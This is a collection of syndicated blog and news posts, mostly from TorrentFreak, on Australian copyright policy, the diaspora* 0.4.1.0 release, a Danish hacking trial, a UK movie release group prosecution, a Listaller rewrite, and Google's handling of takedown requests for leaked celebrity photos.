The discussion paper stands out as the worst I have ever read. The Government has proposed both a graduated response scheme and website blockades without offering any evidence that either of these work. Unsurprisingly the only study the discussion paper references was commissioned by the copyright lobby and claims Australia has a high level of online copyright infringement. This calls into question the validity of the consultation process. The Government could not have arrived at these proposals if independent studies and reports had been consulted.

The entire review was aimed at protecting old media empires from the Internet. This is due, in part, to the massive support given to the Liberal (Conservatives) and National Party coalition in the lead-up to the 2013 federal election, which saw Murdoch-owned News Ltd media, comprising most major print-news outlets in Australia, actively campaign for the incoming Government. There is also a long history of media companies donating heavily to buy influence. Village Roadshow, one of Australia’s largest media conglomerates, has donated close to four million dollars to both major parties since 1998: in the lead-up to the 2013 election alone, it donated over $300,000 to the LNP.

The sort of influence being wielded by the old media is a big part of what Pirate parties worldwide were formed to counter. The Internet gives everyone a platform that can reach millions, if the content is good enough. The money required to distribute culture is rapidly approaching zero and those who built media empires on mechanical distribution models (you know, physical copies of media, DVDs, cassettes etc) want to turn the clock back, because they are losing their power to influence society.

Much of the Pirate Party response centred on the need to allow non-commercial file-sharing, and on the wrong, bordering on fraudulent, assumptions the paper was based on. From the paper:

Digital communications provide challenges and opportunities. Normal interactions, such as sharing culture via the Internet, should not be threatened. Creators should seize the new opportunities provided and embrace new forms of exposure and distribution. The Pirate Party believes the law should account for the realities of this continually emerging paradigm by reducing copyright duration, promoting the remixing and reuse of existing content, and legalising all forms of non-commercial use and distribution of copyrighted materials.

The discussion paper asked, ‘What could constitute ‘reasonable steps’ for ISPs to prevent or avoid copyright infringement?’ This was of particular concern because it is aimed at legally overturning the iiNet case, which set a legal precedent that ISPs couldn’t be sued for the behavior of their users. This section was a not-so-subtle attempt to push for a graduated response (‘three strikes’) system which has been heavily criticized in a number of countries.

The agenda laid out in this discussion paper was very clear, as demonstrated by Question 6: “What matters should the Court consider when determining whether to grant an injunction to block access to a particular website?”

The Pirate Party obviously disagrees with the implication that website blocking was a foregone conclusion. Censorship is not the answer to file-sharing or any other perceived problem on the Internet. Government control of the flow of information is not consistent with an open democracy. The Pirate Party submission attacked website blocking on free speech grounds and explained how measures to block websites or implement a graduated response regime would be trivial to avoid through the use of VPNs.

On Tuesday September 9, a public forum was held on the proposed changes. The panel was stacked with industry lobbyists, and no evidence was presented while the same tired arguments were trotted out to try to convince attendees that there was a need to crack down on file-sharing. It wasn’t all bad though, with the host of the meeting, Communications Minister Malcolm Turnbull, flagging a Government re-think on how to tackle piracy after the scathing responses to the review from the public.

Despite signalling a re-think, the Australian Government is still intent on implementing draconian copyright laws. Consumers may have won this round, but the fight will continue.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The diaspora* blog: diaspora* version 0.4.1.0 released!

This post was syndicated from: The diaspora* blog and was written by: Diaspora* Foundation. Original post: at The diaspora* blog

We're pleased to announce the release of diaspora* v0.4.1.0, which includes lots of bug fixes, changes and also new features. This release has already been tested as a release candidate by some community pods, so we don't expect too much difficulty for podmins when upgrading.

Here are the changes within this release:

  • The admin user search has been improved and admins can also close accounts directly from the admin panel. Project founder Maxwell Salzberg helped to add the account close feature, while Florian Staudacher did the admin UI tweaks.
  • Mikael Nordfeldth improved the federation layer by referencing the Salmon endpoint in Webfinger XRD. This change was made to allow GNU Social and other decentralized networks to integrate with diaspora* more easily than before.
  • Brandon made it possible to enter birth years from 1910 onwards on signup. Our more elderly users shouldn't have to lie about their birth year!
  • The 'lightbox' image viewer has been fixed by Faldrian. Now you can view a large number of photos without having the thumbnails block the actual photo.
  • Also from Faldrian, the in-app Help feature now has a section about keyboard shortcuts. Check them out from your user settings menu.
  • Poll creation was made easier by Damz and lianne from WeGotCoders by automatically adding a new poll answer field without requiring an additional mouse click.
  • A new Terms of Service/Privacy Policy feature is available thanks to Jason Robinson. Podmins can now enable either a template ToS (provided in the code) or write their own. Users will be asked to agree to the ToS on signup.
  • Jason also provided a Rake task to enable podmins to send an email to all or a specific group of users.
  • Damz from WeGotCoders added external crosspost services to the statistics.json output of pods. This allows pod lists to show which services are enabled for which pods, allowing new users to better choose a pod that matches the features they need.
  • Jaiden Gerig tweaked the notifications page ‘Mark All Read’ button so that it marks as read only the notifications visible in the current filter, rather than every notification.
  • Petru Hincu and Florian Staudacher improved the way ignoring a user from the stream works. Now all visible posts from that user are hidden from the stream immediately.
  • It is now possible to delete previously uploaded photos from the photos stream. Thanks Lianne and Daniel Sun from WeGotCoders for this much-requested addition.
  • Most of the remaining Blueprint CSS framework pages have now been ported to Bootstrap during this release, including the admin, help, getting started, people search, settings and contacts pages. For this important work we thank Florian Staudacher, Pablo Cúbico and Błażej Pankowiak.
  • The login page has been completely redesigned by Steffen van Bergerem to fit the rest of the UI.

Bug fixes to old functionality:

  • Petru Hincu fixed a problem with the poll creation elements not being hidden after submission of the post.
  • kpcyrd helped patch a self-XSS in the aspect rename functionality.
  • Jonne Haß fixed Catalan JavaScript translations, which were breaking the new conversation contact search.
  • Dennis Schubert fixed mobile signups, which had been broken by a regression in 0.4.0.0.
  • Erwan Guyader fixed two bugs with notifications. Now "mentioned" and "started sharing" notifications are correctly marked as read on clicking the notification.
  • Utah K Newman and Lyz Ellis fixed UI issues with input element borders.
  • Florian Staudacher fixed a particularly annoying bug where the hovercards got hidden in some situations under other UI elements.

Under the hood, there have been some non-visible changes, including:

  • Petru Hincu refactored some of the notifications code.
  • Goob helped to clarify the configuration defaults and explanations in the application configuration files.

As always, Jonne Haß has done a huge amount of work in maintaining the code base, making sure dependencies are up to date and helping our contributors improve their code. A big thanks also to Steffen van Bergerem and Florian Staudacher for helping land the UI changes.

Several new contributors pushed code this release, including Mikael Nordfeldth, Damz, Daniel Sun, Jaiden Gerig, Lianne, kpcyrd, Utah K Newman and Lyz Ellis. Big thanks to all of them for joining our effort, and a special mention to WeGotCoders, who have chosen diaspora* as a project to help their students learn Ruby on Rails.

A huge thank you to all the contributors from the whole community! If you want to help make diaspora* even better, please check out our getting started guide.

Podmins, please read the changelog for information about the manual steps necessary to upgrade to this release. For those of you who have been testing the release candidate, to get back to the stable release branch, run git checkout master before the update.

TorrentFreak: Jacob Appelbaum Gives Testimony in Gottfrid Svartholm Trial

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The hacking trial of Gottfrid Warg and his alleged 21-year-old Danish accomplice continued this week in Copenhagen, Denmark. While the Pirate Bay founder answered questions during week one, this Wednesday marked the first day the 21-year-old answered questions.

The man, whose identity is being protected, told the Court that while he’s had no formal IT training, he is indeed a computer security expert who had been involved in testing computer systems to see how they hold up to external threats. He admitted working for American, Australian and Danish companies.

The 21-year-old Dane refused to say whether he knows Gottfrid on the grounds that he could be attacked in prison. He did admit to having previously heard about Gottfrid, however.

“Most people in the IT sector have heard of him,” he said.

The Dane also admitted to traveling to Cambodia to visit friends and smoke cannabis, but denied that he went there to meet Gottfrid at his apartment.

The prosecution also presented some emails in which the man said that CSC, the IT company involved in the hack, was owned by the CIA, but he dismissed that comment as a joke.

Discussion also returned to the IRC conversations referenced in the first week of the trial which reportedly took place between ‘My Evil Twin’ (allegedly Gottfrid) and ‘Advanced Persistent Terrorist Threat’ (allegedly the 21-year-old).

Much was made in week one of potentially altered Internet Relay Chat (IRC) logs presented by the prosecution. This week the Dane admitted that he had been involved in some conversations and had actually met ‘My Evil Twin’. That person was not Gottfrid, he said.

In respect of the content of some chats, the Dane said the topic had indeed centered around the security of IT systems, but he insisted that there were no plans to hack CSC or any other companies’ computers. Usernames and passwords of CSC systems that were allegedly exchanged during the IRC chats had been found using Google, he added.

Also of note during the day’s proceedings was the Dane’s continued refusal to provide police with encryption keys to examine the contents of his laptop.

“There is no material on my computer. I can not see how it would make this a better situation,” he told the court.

However, DR.dk reported that during the day, due to the nature of the evidence being presented, it became clear that police had managed to retrieve some information without access to the keys.

After a day’s break in proceedings, on Friday renowned activist and security expert Jacob Appelbaum appeared as an expert witness for the defense. Appelbaum also appeared in Gottfrid’s Swedish trial, a case in which Gottfrid was partly acquitted.

The prosecution previously complained that Appelbaum knows Gottfrid personally, so was unsuitable as an expert witness. The American denied that was the case.

“I’ve only talked a little with Gottfrid as he is not known as a sociable guy. He is not easy to approach and the times that I’ve seen him in social situations it has always been about computer security,” Appelbaum said.

Echoing his testimony in the Swedish case, Appelbaum told the Court that it certainly would have been possible for outsiders to have controlled Gottfrid’s computer to carry out the hack of CSC.

It’s unclear for how long the trial will continue but hearings have been allocated until the end of October.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Pirate Movie Group Members Set to Face FACT in Court

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

There’s a good case to argue that the UK’s Federation Against Copyright Theft (FACT) is the most aggressive anti-piracy group operating in the West today.

While the MPAA softens its approach and becomes friendly on its home turf, FACT – a unit funded by Hollywood – is acting as a proxy overseas in the United Kingdom.

Later this year FACT will take another private prosecution to a criminal court in the UK. According to a press release issued yesterday, five men will face charges that they coordinated the unauthorized online distribution of recently released films.

Other than noting that the men were arrested in 2013, FACT provided no other details and declined further comment for legal reasons. However, TorrentFreak has been able to confirm the following.

Following an investigation into the “sourcing and supply” of pirated films on the Internet, in February last year FACT and police from the economic crime unit targeted four addresses in the West Midlands.

Image from the raid

Four men, then aged 20, 22, 23 and 31, were arrested on suspicion of offenses committed under the Copyright Act, but exactly who they were was never made public.

However, TF discovered that the men were members of a pair of P2P movie release groups known as 26K and RemixHD, a former admin of UnleashTheNet (the site run by busted US-based release group IMAGiNE) and an individual from torrent site The Resistance.

The image below shows the final movie releases of RemixHD, the last taking place on January 29, 2013. The raids took place on February 1, 2013.

FACT now report that five men, one more than originally reported, will face charges at Wolverhampton Crown Court later this year. While men from the two release groups are set to appear, it is unclear whether the former torrent site admins are still in the frame, although it is possible that FACT are referring to them collectively as a release group.

Aside from the fact that this will be the first time that a release group case has ever gone to court in the UK, the case is notable in two other respects.

First, FACT – not the police – are prosecuting the case. Second, nowhere does FACT mention that the five will face charges of copyright infringement; it appears that the main charge now is conspiracy to defraud.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: Klumpp: Listaller: Back to the future!

This post was syndicated from: LWN.net and was written by: n8willis. Original post: at LWN.net

At his blog, Matthias Klumpp provides an update on recent work in Listaller, the cross-distribution framework for third-party package installation. The core issue is that Listaller currently relies on PackageKit’s plugin infrastructure, which is going away. As a result, Klumpp has started work on a substantial rewrite of Listaller that will integrate with AppStream and other up-to-date tools. He is also, notably, taking this opportunity to trim down the project in other respects: “The new incarnation of Listaller will only support installations of statically linked software at the beginning. We will start with a very small, robust core, and then add more features (like dependency-solving) gradually, but only if they are useful. There will be no feature-creep like in the previous version.”

TorrentFreak: Google Refuses to Remove Links to Kate Upton’s “Fappening” Photos

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Nearly two weeks have passed since hundreds of photos of naked celebrities leaked online. This “fappening” triggered a massive takedown operation targeting sites that host and link to the images, Google included.

A few days ago Google received a request to remove links to Kate Upton’s stolen photos. The request was not sent by Upton but by her boyfriend Justin Verlander, who also appears in a few of the leaked images.

The notice includes hundreds of URLs of sites such as thefappening.eu where the photos are hosted without permission.

It’s quite unusual for Google’s takedown team to be confronted with a long list of links to naked celebrity pictures. This may explain why it took a while before a decision was reached on the copyright-infringing status of the URLs, a process that may involve a cumbersome manual review.

Yesterday the first batch was processed and interestingly enough Google decided to leave more than half of all URLs untouched. The overview below shows that of the 444 links processed, only 45% were removed.

The big question is, of course, why?

Verlander’s takedown request

Google doesn’t explain its decision to keep the links in question in its search results. In some cases the original content had already been removed at the source site, so these URLs didn’t have to be removed.

Other rejections are more mysterious though. For example, the thefappening.eu URLs that remain online all pointed to stolen images when we checked. Most of these were not nudes, but they certainly weren’t posted with permission.

One possible explanation for Google’s inaction is that Verlander most likely claimed to own the copyright on the images, something he can only do with pictures he took himself. With Upton’s selfies this is hard to do, unless she signed away her rights.

While browsing through the reported URLs we also noticed another trend. Some sites have replaced Upton’s leaked photos with photos of other random naked women. Google’s takedown team apparently has a sharp eye because these were not removed by Google either.

Chilling Effects, who host Google’s takedown requests, just posted a redacted version of the original notice with Upton’s name removed. Unfortunately this doesn’t offer more clues to resolve this takedown mystery, so for now we can only guess why many of the links remain indexed.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.